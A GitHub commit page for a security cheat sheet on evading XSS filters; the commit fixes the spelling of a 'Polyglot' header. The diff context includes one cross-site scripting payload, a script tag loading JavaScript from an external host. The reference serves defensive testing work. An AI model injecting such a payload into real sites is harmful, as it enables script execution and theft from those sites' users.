Skip to content

Commit

Permalink
Update XSS_Filter_Evasion_Cheat_Sheet.md (#1256)
Browse files Browse the repository at this point in the history
Polyglot typo in XSS Locator header.
(as discussed in #1255)
  • Loading branch information
blue42-david authored Dec 8, 2023
1 parent cc04f3a commit bc20df6
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.md
Original file line number Diff line number Diff line change
Expand Up @@ -14,7 +14,7 @@ This is a normal XSS JavaScript injection, and most likely to get caught but I s

`<SCRIPT SRC=https://cdn.jsdelivr.net/gh/Moksh45/host-xss.rocks/index.js></SCRIPT>`

### XSS Locator (Polygot)
### XSS Locator (Polyglot)

The following is a "polyglot test XSS payload." This test will execute in multiple contexts including html, script string, js and URL. (Based on this [tweet](https://twitter.com/garethheyes/status/997466212190781445) by [Gareth Heyes](https://twitter.com/garethheyes)).

Expand Down

0 comments on commit bc20df6

Please sign in to comment.